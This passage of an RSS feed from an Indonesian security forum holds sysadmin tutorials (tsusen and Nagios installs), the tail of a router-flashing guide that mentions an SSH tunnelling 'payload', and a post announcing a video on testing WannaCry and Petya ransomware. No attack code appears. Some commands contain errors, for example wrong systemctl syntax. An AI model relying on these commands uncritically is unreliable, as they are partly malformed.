- Firmware LEDE <a href="http://pulpstone.pw/wp-content/uploads/firmware/lede/17.01.4/brcm63xx/pulpstone-lede-17.01.4-brcm63xx-generic-HG553-squashfs-cfe.bin" target="_blank" class="mycode_url">Pulpstone</a> (<a href="http://pulpstone.pw/wp-content/uploads/firmware/lede/17.01.4/brcm63xx/READ_ME.txt" target="_blank" class="mycode_url">TUTOR FLASHING</a>)<br />
- Firmware <a href="https://goo.gl/CFW1s2" target="_blank" class="mycode_url">OpenWRT CC Angel Beats</a> (Tutor ada didalam file)<br />
- Akun SSH/VPN (misalnya dari <a href="http://fastssh.com/" target="_blank" class="mycode_url">FastSSH</a>)<br />
- Payload<br />
<br />
Tata cara flash, jika HG553 kalian masih pakai firmware original :<br />
Flash LEDE Pulpstone pakai opsi Firmware Upgrade &gt; lalu Flash OpenWRT CC Angel Beats<br />
<br />
Semua tutor lengkap Flash udah tertera di file firmware yang kalian download diatas, jadi budayakan membaca!<br />
<br />
<br />
<br />
Proof :<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/hN6SIh55Tkg" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
<br />
Oke sekian seperti itu saja. Semoga bermanfaat.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cara install tsusen di Ubuntu 16.04/17.04 (Monitoring trafic berbasis web)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-229.html</link>
			<pubDate>Sun, 22 Oct 2017 16:11:18 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-229.html</guid>
			<description><![CDATA[Malam guys..<br />
Kali ini saya akan coba mempraktekan cara install tsusen di dalam web server..<br />
Sebelum masuk ke tutorial ada yang tau tsusen itu apa??<br />
<br />
Okay, mungkin saya akan menjelaskan secara singkat mengenai tsusen ini..<br />
Tsusen adalah aplikasi untuk monitoring setiap trafic masuk di dalam port tcp. Aplikasi ini cocok buat kalian yang ingin memperdalam untuk menjadi sysadmin. Di tsusen ini kita bisa memonitoring ip mana saja yang melakukan request masuk yang paling banyak ke dalam web server kita. Untuk informasi lebih lanjut bisa di lihat di <a href="https://github.com/stamparm/tsusen" target="_blank" class="mycode_url">github</a> informasinya.<br />
<br />
Kita lanjut ke tutorial, caranya cukup mudah kita tinggal ketik perintah ini di console..<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; apt-get install git python-pip python-pcapy screen<br />
root[~] &gt;&gt; pip install python-geoip python-geoip-geolite2<br />
root[~] &gt;&gt; git clone https://github.com/stamparm/tsusen</code></div></div><br />
Untuk menjalankannya melalui backgroun kita bisa ketik di terminal menggunakan screen agar si tsusennya bisa terus berjalan saat terminal kita di close. Kurang lebih perintahnya seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; screen<br />
root[/root/tsusen] &gt;&gt; cd tsusen/<br />
root[/root/tsusen] &gt;&gt; python tsusen.py</code></div></div><br />
Saat tsusen berjalan, secara default dia akan membuka port 3889<br />
Untuk mengaksesnya kita tinggal buka alamat ip address atau domain di tambah port 3889 di dalam browser.<br />
Contoh alamatnya seperti ini:<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite><a href="http://backboxindonesia.or.id:3889" target="_blank" class="mycode_url">http://backboxindonesia.or.id:3889</a></blockquote>
<br />
<br />
Kurang lebih hasilnya akan menjadi seperti ini<br />
<br />
<img src="https://image.prntscr.com/image/GjiY0RdIQHOXa4Rv3UBCyQ.png" alt="[Image: GjiY0RdIQHOXa4Rv3UBCyQ.png]" class="mycode_img" /><br />
<br />
<img src="https://image.prntscr.com/image/M-v2jVRQQtWQsdz_tcSTmw.png" alt="[Image: M-v2jVRQQtWQsdz_tcSTmw.png]" class="mycode_img" /><br />
<br />
Mungkin cukup sekian tutor dari saya.<br />
Semoga ilmunya bermanfaat...]]></description>
			<content:encoded><![CDATA[Malam guys..<br />
Kali ini saya akan coba mempraktekan cara install tsusen di dalam web server..<br />
Sebelum masuk ke tutorial ada yang tau tsusen itu apa??<br />
<br />
Okay, mungkin saya akan menjelaskan secara singkat mengenai tsusen ini..<br />
Tsusen adalah aplikasi untuk monitoring setiap trafic masuk di dalam port tcp. Aplikasi ini cocok buat kalian yang ingin memperdalam untuk menjadi sysadmin. Di tsusen ini kita bisa memonitoring ip mana saja yang melakukan request masuk yang paling banyak ke dalam web server kita. Untuk informasi lebih lanjut bisa di lihat di <a href="https://github.com/stamparm/tsusen" target="_blank" class="mycode_url">github</a> informasinya.<br />
<br />
Kita lanjut ke tutorial, caranya cukup mudah kita tinggal ketik perintah ini di console..<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; apt-get install git python-pip python-pcapy screen<br />
root[~] &gt;&gt; pip install python-geoip python-geoip-geolite2<br />
root[~] &gt;&gt; git clone https://github.com/stamparm/tsusen</code></div></div><br />
Untuk menjalankannya melalui backgroun kita bisa ketik di terminal menggunakan screen agar si tsusennya bisa terus berjalan saat terminal kita di close. Kurang lebih perintahnya seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; screen<br />
root[/root/tsusen] &gt;&gt; cd tsusen/<br />
root[/root/tsusen] &gt;&gt; python tsusen.py</code></div></div><br />
Saat tsusen berjalan, secara default dia akan membuka port 3889<br />
Untuk mengaksesnya kita tinggal buka alamat ip address atau domain di tambah port 3889 di dalam browser.<br />
Contoh alamatnya seperti ini:<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite><a href="http://backboxindonesia.or.id:3889" target="_blank" class="mycode_url">http://backboxindonesia.or.id:3889</a></blockquote>
<br />
<br />
Kurang lebih hasilnya akan menjadi seperti ini<br />
<br />
<img src="https://image.prntscr.com/image/GjiY0RdIQHOXa4Rv3UBCyQ.png" alt="[Image: GjiY0RdIQHOXa4Rv3UBCyQ.png]" class="mycode_img" /><br />
<br />
<img src="https://image.prntscr.com/image/M-v2jVRQQtWQsdz_tcSTmw.png" alt="[Image: M-v2jVRQQtWQsdz_tcSTmw.png]" class="mycode_img" /><br />
<br />
Mungkin cukup sekian tutor dari saya.<br />
Semoga ilmunya bermanfaat...]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Install nagios di ubuntu 16.04/17.04 server]]></title>
			<link>https://www.backboxindonesia.or.id/thread-228.html</link>
			<pubDate>Fri, 06 Oct 2017 06:43:06 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-228.html</guid>
			<description><![CDATA[Perintah untuk install nagios<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>user[~] &gt;&gt; sudo su<br />
root[~] &gt;&gt; apt-get install wget build-essential apache2 php apache2-mod-php7.0 php-gd libgd-dev sendmail unzip<br />
root[~] &gt;&gt; useradd nagios<br />
root[~] &gt;&gt; groupadd nagcmd<br />
root[~] &gt;&gt; usermod -a -G nagcmd nagios<br />
root[~] &gt;&gt; usermod -a -G nagios,nagcmd www-data<br />
root[~] &gt;&gt; cd ~<br />
root[~] &gt;&gt; wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz<br />
root[~] &gt;&gt; tar -xzf nagios*.tar.gz<br />
root[~] &gt;&gt; cd nagios-4.3.2/<br />
root[~] &gt;&gt; ./configure --with-nagios-group=nagios --with-command-group=nagcmd<br />
root[~] &gt;&gt; make all<br />
root[~] &gt;&gt; make install<br />
root[~] &gt;&gt; make install-commandmode<br />
root[~] &gt;&gt; make install-init<br />
root[~] &gt;&gt; make install-config<br />
root[~] &gt;&gt; /usr/bin/install -c -m 644 sample-config/httpd.conf /etc/apache2/sites-available/nagios.conf<br />
root[~] &gt;&gt; cp -R contrib/eventhandlers/ /usr/local/nagios/libexec/<br />
root[~] &gt;&gt; chown -R nagios:nagios /usr/local/nagios/libexec/eventhandlers<br />
root[~] &gt;&gt; cd ~<br />
root[~] &gt;&gt; wget https://nagios-plugins.org/download/nagios-plugins-2.2.1.tar.gz<br />
root[~] &gt;&gt; tar -xzf nagios-plugins*.tar.gz<br />
root[~] &gt;&gt; cd nagios-plugin-2.2.1/<br />
root[~] &gt;&gt; ./configure --with-nagios-user=nagios --with-nagios-group=nagios --with-openssl<br />
root[~] &gt;&gt; make<br />
root[~] &gt;&gt; make install<br />
root[~] &gt;&gt; nano /usr/local/nagios/etc/objects/contacts.cfg</code></div></div><br />
<br />
Edit contact email, contoh<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>email budi@backboxindonesia.or.id</blockquote>
<br />
<br />
Perintah selanjutnya<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; a2enmod rewrite<br />
root[~] &gt;&gt; a2enmod cgi<br />
root[~] &gt;&gt; htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin</code></div></div><br />
<br />
Masukan password untuk login nagiosnya<br />
Kemudian ketik lagi perintah di bawah<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; ln -s /etc/apache2/sites-available/nagios.conf /etc/apache2/sites-enabled/<br />
root[~] &gt;&gt; nano /etc/systemd/system/nagios.service</code></div></div><br />
<br />
Di dalam nano tambahkan script ini<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>[Unit]<br />
Description=Nagios<br />
BindTo=network.target<br />
<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
<br />
[Service]<br />
User=nagios<br />
Group=nagios<br />
Type=simple<br />
ExecStart=/usr/local/nagios/bin/nagios /usr/local/nagios/etc/nagios.cfg</blockquote>
<br />
<br />
Selanjutnya masukan perintah ini<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; systemctl enable /etc/systemd/system/nagios.service<br />
root[~] &gt;&gt; systemctl apache2 restart<br />
root[~] &gt;&gt; systemctl nagios start<br />
root[~] &gt;&gt; systemctl nagios restart</code></div></div><br />
<br />
Testing nagios di browser, contoh alamatnya <a href="http://192.168.1.69/nagios/" target="_blank" class="mycode_url">http://192.168.1.69/nagios/</a><br />
Kalo muncul popup login berarti nagios sudah kita install.<br />
Setelah itu masukkan username dan password yang telah kita buat tadi. Sebagai contoh<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>User : nagiosadmin<br />
Pass : passwordygkitabuattadi</blockquote>
<br />
<br />
Step selanjutnya menambahkan host di dalam nagios, perintahnya adalah<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; apt-get install nagios-nrpe-server nagios-plugins<br />
root[~] &gt;&gt; nano /etc/nagios/nrpe.cfg</code></div></div><br />
<br />
Ganti server_address dengan ip address kita<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>server_address=192.168.1.69</blockquote>
<br />
<br />
Masukan perintah ini<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; service nagios-nrpe-server restart<br />
root[~] &gt;&gt; nano /usr/local/nagios/etc/objects/baru.cfg</code></div></div><br />
<br />
Masukan script ini untuk menambahkan host ke dalam nagios<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>define host{<br />
        use                     linux-server<br />
        host_name               Server<br />
        alias                   Server<br />
        address                 192.168.1.2<br />
        }</blockquote>
<br />
<br />
Perintah selanjutnya adalah<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; nano /usr/local/nagios/etc/nagios.cfg</code></div></div><br />
<br />
Setelah itu kita tambahkan script ini<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>cfg_file=/usr/local/nagios/etc/objects/baru.cfg</blockquote>
<br />
<br />
Sampai di sini nagios sudah bisa kita gunakan. Untuk perintah selanjutnya kita reload terlebih dahulu nagiosnya sebelum kita buka di browser dengan perintah ini.<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; /etc/init.d/nagios restart</code></div></div><br />
<br />
Setelah di restart kita buka alamat ini <a href="http://192.168.1.69/nagios/" target="_blank" class="mycode_url">http://192.168.1.69/nagios/</a> di browser. Dan setelah di tambah beberapa host di config nagios kurang lebih seperti ini tampilannya..<br />
<br />
<span style="color: #ffffff;" class="mycode_color"><img src="https://image.prntscr.com/image/ZhgX1m5hQ_uQxt6BuGq2LQ.png" alt="[Image: ZhgX1m5hQ_uQxt6BuGq2LQ.png]" class="mycode_img" /></span><br />
<br />
Maaf kalo tutorialnya singkat banget. hehe<br />
Akhir kata, selamat belajar. :)]]></description>
			<content:encoded><![CDATA[Perintah untuk install nagios<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>user[~] &gt;&gt; sudo su<br />
root[~] &gt;&gt; apt-get install wget build-essential apache2 php apache2-mod-php7.0 php-gd libgd-dev sendmail unzip<br />
root[~] &gt;&gt; useradd nagios<br />
root[~] &gt;&gt; groupadd nagcmd<br />
root[~] &gt;&gt; usermod -a -G nagcmd nagios<br />
root[~] &gt;&gt; usermod -a -G nagios,nagcmd www-data<br />
root[~] &gt;&gt; cd ~<br />
root[~] &gt;&gt; wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz<br />
root[~] &gt;&gt; tar -xzf nagios*.tar.gz<br />
root[~] &gt;&gt; cd nagios-4.3.2/<br />
root[~] &gt;&gt; ./configure --with-nagios-group=nagios --with-command-group=nagcmd<br />
root[~] &gt;&gt; make all<br />
root[~] &gt;&gt; make install<br />
root[~] &gt;&gt; make install-commandmode<br />
root[~] &gt;&gt; make install-init<br />
root[~] &gt;&gt; make install-config<br />
root[~] &gt;&gt; /usr/bin/install -c -m 644 sample-config/httpd.conf /etc/apache2/sites-available/nagios.conf<br />
root[~] &gt;&gt; cp -R contrib/eventhandlers/ /usr/local/nagios/libexec/<br />
root[~] &gt;&gt; chown -R nagios:nagios /usr/local/nagios/libexec/eventhandlers<br />
root[~] &gt;&gt; cd ~<br />
root[~] &gt;&gt; wget https://nagios-plugins.org/download/nagios-plugins-2.2.1.tar.gz<br />
root[~] &gt;&gt; tar -xzf nagios-plugins*.tar.gz<br />
root[~] &gt;&gt; cd nagios-plugin-2.2.1/<br />
root[~] &gt;&gt; ./configure --with-nagios-user=nagios --with-nagios-group=nagios --with-openssl<br />
root[~] &gt;&gt; make<br />
root[~] &gt;&gt; make install<br />
root[~] &gt;&gt; nano /usr/local/nagios/etc/objects/contacts.cfg</code></div></div><br />
<br />
Edit contact email, contoh<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>email budi@backboxindonesia.or.id</blockquote>
<br />
<br />
Perintah selanjutnya<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; a2enmod rewrite<br />
root[~] &gt;&gt; a2enmod cgi<br />
root[~] &gt;&gt; htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin</code></div></div><br />
<br />
Masukan password untuk login nagiosnya<br />
Kemudian ketik lagi perintah di bawah<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; ln -s /etc/apache2/sites-available/nagios.conf /etc/apache2/sites-enabled/<br />
root[~] &gt;&gt; nano /etc/systemd/system/nagios.service</code></div></div><br />
<br />
Di dalam nano tambahkan script ini<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>[Unit]<br />
Description=Nagios<br />
BindTo=network.target<br />
<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
<br />
[Service]<br />
User=nagios<br />
Group=nagios<br />
Type=simple<br />
ExecStart=/usr/local/nagios/bin/nagios /usr/local/nagios/etc/nagios.cfg</blockquote>
<br />
<br />
Selanjutnya masukan perintah ini<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; systemctl enable /etc/systemd/system/nagios.service<br />
root[~] &gt;&gt; systemctl apache2 restart<br />
root[~] &gt;&gt; systemctl nagios start<br />
root[~] &gt;&gt; systemctl nagios restart</code></div></div><br />
<br />
Testing nagios di browser, contoh alamatnya <a href="http://192.168.1.69/nagios/" target="_blank" class="mycode_url">http://192.168.1.69/nagios/</a><br />
Kalo muncul popup login berarti nagios sudah kita install.<br />
Setelah itu masukkan username dan password yang telah kita buat tadi. Sebagai contoh<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>User : nagiosadmin<br />
Pass : passwordygkitabuattadi</blockquote>
<br />
<br />
Step selanjutnya menambahkan host di dalam nagios, perintahnya adalah<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; apt-get install nagios-nrpe-server nagios-plugins<br />
root[~] &gt;&gt; nano /etc/nagios/nrpe.cfg</code></div></div><br />
<br />
Ganti server_address dengan ip address kita<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>server_address=192.168.1.69</blockquote>
<br />
<br />
Masukan perintah ini<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; service nagios-nrpe-server restart<br />
root[~] &gt;&gt; nano /usr/local/nagios/etc/objects/baru.cfg</code></div></div><br />
<br />
Masukan script ini untuk menambahkan host ke dalam nagios<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>define host{<br />
        use                     linux-server<br />
        host_name               Server<br />
        alias                   Server<br />
        address                 192.168.1.2<br />
        }</blockquote>
<br />
<br />
Perintah selanjutnya adalah<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; nano /usr/local/nagios/etc/nagios.cfg</code></div></div><br />
<br />
Setelah itu kita tambahkan script ini<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>cfg_file=/usr/local/nagios/etc/objects/baru.cfg</blockquote>
<br />
<br />
Sampai di sini nagios sudah bisa kita gunakan. Untuk perintah selanjutnya kita reload terlebih dahulu nagiosnya sebelum kita buka di browser dengan perintah ini.<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root[~] &gt;&gt; /etc/init.d/nagios restart</code></div></div><br />
<br />
Setelah di restart kita buka alamat ini <a href="http://192.168.1.69/nagios/" target="_blank" class="mycode_url">http://192.168.1.69/nagios/</a> di browser. Dan setelah di tambah beberapa host di config nagios kurang lebih seperti ini tampilannya..<br />
<br />
<span style="color: #ffffff;" class="mycode_color"><img src="https://image.prntscr.com/image/ZhgX1m5hQ_uQxt6BuGq2LQ.png" alt="[Image: ZhgX1m5hQ_uQxt6BuGq2LQ.png]" class="mycode_img" /></span><br />
<br />
Maaf kalo tutorialnya singkat banget. hehe<br />
Akhir kata, selamat belajar. :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Tutorial Testing WannaCry and Petrwrap Petya 2017]]></title>
			<link>https://www.backboxindonesia.or.id/thread-226.html</link>
			<pubDate>Mon, 03 Jul 2017 12:32:46 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-226.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.<br />
Yaitu Ransomware WannaCry dan Petrwrap/Petya.<br />
Gunakan Dengan Resiko Anda Sendiri.<br />
Untuk tujuan pembelajaran saja.<br />
Untuk tujuan pendidikan saja<br />
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR. <br />
KALO GABISA DECRYPT NYA !!! :V :gerah:lol <br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/z4d2Po6sbVE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.<br />
Yaitu Ransomware WannaCry dan Petrwrap/Petya.<br />
Gunakan Dengan Resiko Anda Sendiri.<br />
Untuk tujuan pembelajaran saja.<br />
Untuk tujuan pendidikan saja<br />
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR. <br />
KALO GABISA DECRYPT NYA !!! :V :gerah:lol <br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/z4d2Po6sbVE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>]]></content:encoded>
		</item>
	</channel>
</rss>